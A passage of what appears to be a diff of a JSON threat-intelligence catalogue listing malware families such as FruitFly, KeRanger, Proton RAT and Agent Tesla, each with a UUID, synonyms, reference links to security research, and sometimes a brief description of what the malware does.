"https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?" 
- ] - }, - "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", - "value": "Crisis", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crossrider", - "https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/?utm_source=twitter&utm_medium=social" - ] - }, - "uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302", - "value": "Crossrider", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dockster", - "http://contagiodump.blogspot.com/2012/12/osxdockstera-and-win32trojanagentaxmo.html", - "https://www.f-secure.com/weblog/archives/00002466.html" - ] - }, - "uuid": "713d8ec4-4983-4fbb-827c-2ef5bc0e6930", - "value": "Dockster", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dummy", - "https://objective-see.com/blog/blog_0x32.html" - ] - }, - "uuid": "cbf9ff89-d35b-4954-8873-32f59f5e4d7d", - "value": "Dummy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilosx", - "https://github.com/Marten4n6/EvilOSX", - "https://twitter.com/JohnLaTwC/status/966139336436498432" - ] - }, - "uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d", - "value": "EvilOSX", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.flashback", - "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", - "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html", - "http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html" - ] - }, - "uuid": "f92b5355-f398-4f09-8bcc-e06df6fe51a0", - "value": "FlashBack", - "description": "" - }, - { - "meta": 
{ - "synonyms": [ - "Quimitchin" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly", - "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/", - "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/", - "https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/", - "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/", - "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html", - "https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Patrick-Wardle-Offensive-Malware-Analysis-Fruit-Fly-UPDATED..pdf" - ] - }, - "uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597", - "value": "FruitFly", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus", - "https://blog.malwarebytes.com/threat-analysis/2017/12/interesting-disguise-employed-by-new-mac-malware/" - ] - }, - "uuid": "fc17e41f-e9f7-4442-a05c-7a19b9174c39", - "value": "HiddenLotus", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Revir" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.imuler", - "http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html", - "https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/" - ] - }, - "uuid": "261fd543-60e4-470f-af28-7a9b17ba4759", - "value": "iMuler", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keranger", - "https://objective-see.com/blog/blog_0x16.html", - 
"http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/", - "https://www.macworld.com/article/3234650/macs/keranger-the-first-in-the-wild-ransomware-for-macs-but-certainly-not-the-last.html" - ] - }, - "uuid": "01643bc9-bd61-42e8-b9f1-5fbf83dcd786", - "value": "KeRanger", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap", - "https://objective-see.com/blog/blog_0x16.html", - "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/", - "https://github.com/eset/malware-ioc/tree/master/keydnap" - ] - }, - "uuid": "2173605b-bf44-4c76-b75a-09c53bb322d6", - "value": "Keydnap", - "description": "" - }, - { - "meta": { - "synonyms": [ - "KitM" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.kitmos", - "https://www.f-secure.com/weblog/archives/00002558.html" - ] - }, - "uuid": "8a1b1c99-c149-4339-9058-db3b4084cdcd", - "value": "Kitmos", - "description": "" - }, - { - "meta": { - "synonyms": [ - "SedUploader", - "JHUHUGIT", - "JKEYSKW" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.komplex", - "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/", - "https://objective-see.com/blog/blog_0x16.html", - "https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf" - ] - }, - "uuid": "d26b5518-8d7f-41a6-b539-231e4962853e", - "value": "Komplex", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.laoshu", - "https://objective-see.com/blog/blog_0x16.html", - 
"https://nakedsecurity.sophos.com/2014/01/21/data-stealing-malware-targets-mac-users-in-undelivered-courier-item-attack/" - ] - }, - "uuid": "a13a2cb8-b0e6-483a-9916-f44969a2c42b", - "value": "Laoshu", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.leverage", - "https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/", - "https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis" - ] - }, - "uuid": "15daa766-f721-4fd5-95fb-153f5361fb87", - "value": "Leverage", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macdownloader", - "https://iranthreats.github.io/resources/macdownloader-macos-malware/" - ] - }, - "uuid": "910d3c78-1a9e-4600-a3ea-4aa5563f0f13", - "value": "MacDownloader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macinstaller", - "https://objective-see.com/blog/blog_0x16.html" - ] - }, - "uuid": "d1f8af3c-719b-4f64-961b-8d89a2defa02", - "value": "MacInstaller", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macransom", - "https://blog.fortinet.com/2017/06/09/macransom-offered-as-ransomware-as-a-service", - "https://objective-see.com/blog/blog_0x1E.html" - ] - }, - "uuid": "66862f1a-5823-4a9a-bd80-439aaafc1d8b", - "value": "MacRansom", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macspy", - "https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service" - ] - }, - "uuid": "c9915d41-d1fb-45bc-997e-5cd9c573d8e7", - "value": "MacSpy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.macvx", - "https://objective-see.com/blog/blog_0x16.html" - ] - }, - "uuid": "4db9012b-d3a1-4f19-935c-4dbc7fdd93fe", - "value": "MacVX", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mami", - "https://objective-see.com/blog/blog_0x26.html" - ] - }, - "uuid": "7759534c-3298-42e9-adab-896d7e507f4f", - "value": "MaMi", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mokes", - "https://objective-see.com/blog/blog_0x16.html", - "https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/" - ] - }, - "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", - "value": "Mokes", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mughthesec", - "https://objective-see.com/blog/blog_0x20.html" - ] - }, - "uuid": "aa1bf4e5-9c44-42a2-84e5-7526e4349405", - "value": "Mughthesec", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus", - "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update", - "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", - "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/" - ] - }, - "uuid": "65b7eff4-741c-445e-b4e0-8a4e4f673a65", - "value": "OceanLotus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.olyx", - 
"http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", - "https://news.drweb.com/show/?i=1750&lng=en&c=14" - ] - }, - "uuid": "cd397973-8f42-4c49-8322-414ea77ec773", - "value": "Olyx", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Findzip" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.patcher", - "http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/" - ] - }, - "uuid": "bad1057c-4f92-4747-a0ec-31bcc062dab8", - "value": "Patcher", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit", - "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf", - "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/" - ] - }, - "uuid": "b749ff3a-df68-4b38-91f1-649864eae52c", - "value": "Pirrit", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Calisto" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.proton_rat", - "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does", - "https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/", - "https://objective-see.com/blog/blog_0x1D.html", - "https://securelist.com/calisto-trojan-for-macos/86543/", - "https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/", - "https://objective-see.com/blog/blog_0x1F.html", - "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/", - "https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/", - "https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf" - ] - }, - "uuid": "d7e31f19-8bf2-4def-8761-6c5bf7feaa44", - 
"value": "Proton RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pwnet", - "https://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/" - ] - }, - "uuid": "70059ec2-9315-4af7-b65b-2ec35676a7bb", - "value": "Pwnet", - "description": "Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack." - }, - { - "meta": { - "synonyms": [ - "Retefe" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe", - "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/", - "http://www.brycampbell.co.uk/new-blog/2017/4/30/retefe-and-osxdok-one-and-the-same", - "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/", - "https://www.govcert.admin.ch/blog/33/the-retefe-saga" - ] - }, - "uuid": "80acc956-d418-42e3-bddf-078695a01289", - "value": "Dok", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.systemd", - "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en" - ] - }, - "uuid": "a8e7687b-9db7-4606-ba81-320d36099e3a", - "value": "systemd", - "description": "General purpose backdoor" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.uroburos", - "https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/", - "https://blog.malwarebytes.com/threat-analysis/2017/05/snake-malware-ported-windows-mac/" - ] - }, - "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", - "value": "Uroburos", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.winnti", - " https://401trg.pw/an-update-on-winnti/", - "https://401trg.pw/winnti-evolution-going-open-source/" - ] - }, - "uuid": 
"7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", - "value": "Winnti", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirelurker", - "https://objective-see.com/blog/blog_0x16.html", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" - ] - }, - "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", - "value": "WireLurker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirenet", - "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", - "https://news.drweb.com/show/?i=2679&lng=en&c=14" - ] - }, - "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", - "value": "Wirenet", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xagent", - "https://twitter.com/PhysicalDrive0/status/845009226388918273", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf", - "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/" - ] - }, - "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", - "value": "X-Agent", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xslcmd", - "https://objective-see.com/blog/blog_0x16.html" - ] - }, - "uuid": "120a5890-dc3e-42e8-950e-b5ff9a849d2a", - "value": "XSLCmd", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/php.pas", - "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity", - "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html" - ] - }, - "uuid": 
"e6a40fa2-f79f-40e9-89d3-a56984bc51f7", - "value": "PAS", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Webshell by Orb" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/php.wso", - "https://github.com/wso-shell", - "https://securelist.com/energetic-bear-crouching-yeti/85345/" - ] - }, - "uuid": "7f3794fc-662e-4dde-b793-49bcaccc96f7", - "value": "WSO", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/pl.silence_ddos", - "https://www.group-ib.com/resources/threat-research/silence.html" - ] - }, - "uuid": "b5cc7a39-305b-487e-b15a-02dcebefce90", - "value": "Silence DDoS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater", - "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" - ] - }, - "uuid": "99600ba5-30a0-4ac8-8583-6288760b77c3", - "value": "BONDUPDATER", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ghostminer", - "https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless" - ] - }, - "uuid": "0db05333-2214-49c3-b469-927788932aaa", - "value": "GhostMiner", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.poshspy", - "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html", - "https://github.com/matthewdunwoody/POSHSPY" - ] - }, - "uuid": "4df1b257-c242-46b0-b120-591430066b6f", - "value": "POSHSPY", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerware", - "https://blog.cylance.com/ransomware-update-todays-bountiful-cornucopia-of-extortive-threats" - ] - }, 
- "uuid": "5c5beab9-614c-4c86-b369-086234ddb43c", - "value": "PowerWare", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powruner", - "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" - ] - }, - "uuid": "63f6df51-4de3-495a-864f-0a7e30c3b419", - "value": "POWRUNER", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent", - "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca" - ] - }, - "uuid": "e27bfd65-4a58-416a-b03a-1ab1703edb24", - "value": "QUADAGENT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/", - "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca" - ] - }, - "uuid": "1e27a569-1899-4f6f-8c42-aa91bf0a539d", - "value": "RogueRobin", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.tater", - "https://github.com/Kevin-Robertson/Tater" - ] - }, - "uuid": "808445e6-f51c-4b5d-a812-78102bf60d24", - "value": "Tater PrivEsc", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.thundershell", - "https://github.com/Mr-Un1k0d3r/ThunderShell" - ] - }, - "uuid": "fd9904a6-6e06-4b50-8bfd-64ffb793d4a4", - "value": "ThunderShell", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wmimplant", - 
"https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html" - ] - }, - "uuid": "d1150a1a-a2f4-4954-b22a-a85b7876408e", - "value": "WMImplant", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot", - "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/", - "https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/", - "https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A", - "http://seclists.org/fulldisclosure/2017/Mar/7", - "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/", - "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", - "http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f" - ] - }, - "uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5", - "value": "BrickerBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/py.saphyra", - "https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/", - "https://www.youtube.com/watch?v=Bk-utzAlYFI" - ] - }, - "uuid": "30a22cdb-9393-460b-86ae-08d97c626155", - "value": "Saphyra", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/symbian.flexispy", - "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" - ] - }, - "uuid": "4305d59a-0d07-4021-a902-e7996378898b", - "value": "FlexiSpy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n", - 
"https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/", - "https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n" - ] - }, - "uuid": "ac2608e9-7851-409f-b842-e265b877a53c", - "value": "7ev3n", - "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"" - }, - { - "meta": { - "synonyms": [ - "Hydraq", - "McRAT" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002", - "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", - "https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/", - "https://community.hpe.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/6894315", - "http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/", - "https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html", - "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html", - 
"https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures", - "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/" - ] - }, - "uuid": "bab647d7-c9d6-4697-8fd2-1295c7429e1f", - "value": "9002 RAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "PinkKite" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos", - "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak", - "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/" - ] - }, - "uuid": "a492a3e0-13cb-4b7d-93c1-027e7e69b44d", - "value": "AbaddonPOS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.abbath_banker" - ] - }, - "uuid": "e46262cd-961f-4c7d-8976-0d35a066ab83", - "value": "Abbath Banker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain", - "https://thisissecurity.stormshield.com/2018/08/28/acridrain-stealer/" - ] - }, - "uuid": "ffc368a5-2cd0-44ca-869b-223fdb462c41", - "value": "AcridRain", - "description": "AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies, credit cards from multiple browsers. It can also dump Telegram and Steam sessions, rob Filezilla recent connections, and more." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym", - "https://www.arbornetworks.com/blog/asert/acronym-m-is-for-malware/" - ] - }, - "uuid": "bee73d0f-8ff3-44ba-91dc-d883884c754e", - "value": "Acronym", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker", - "https://twitter.com/JaromirHorejsi/status/813712587997249536", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016" - ] - }, - "uuid": "1ed36f9a-ae00-4d16-bbf7-e97217385fb1", - "value": "AdamLocker", - "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim\u2019s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.adkoob", - "https://news.sophos.com/en-us/2018/07/29/adkoob-information-thief-targets-facebook-ad-purchase-info/" - ] - }, - "uuid": "ace3cb99-3523-44a1-92cc-9f002cf364bf", - "value": "win.adkoob", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot", - "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot" - ] - }, - "uuid": "e3f49ec0-614e-4070-a620-5196d45df7b5", - "value": "AdvisorsBot", - "description": "AdvisorsBot is a downloader named after early command and control domains that all contained the word \"advisors\". The malware is written in C and employs a number of anti-analysis features such as junk code, stack strings and Windows API function hashing." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.adylkuzz", - "https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar" - ] - }, - "uuid": "3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58", - "value": "Adylkuzz", - "description": "" - }, - { - "meta": { - "synonyms": [ - "ComRAT", - "Sun rootkit" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz", - "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html", - "https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/", - "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", - "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat", - "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", - "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/", - "http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/" - ] - }, - "uuid": "d9cc15f7-0880-4ae4-8df4-87c58338d6b8", - "value": "Agent.BTZ", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/", - "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/", - "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting", - "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr", - "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html", - 
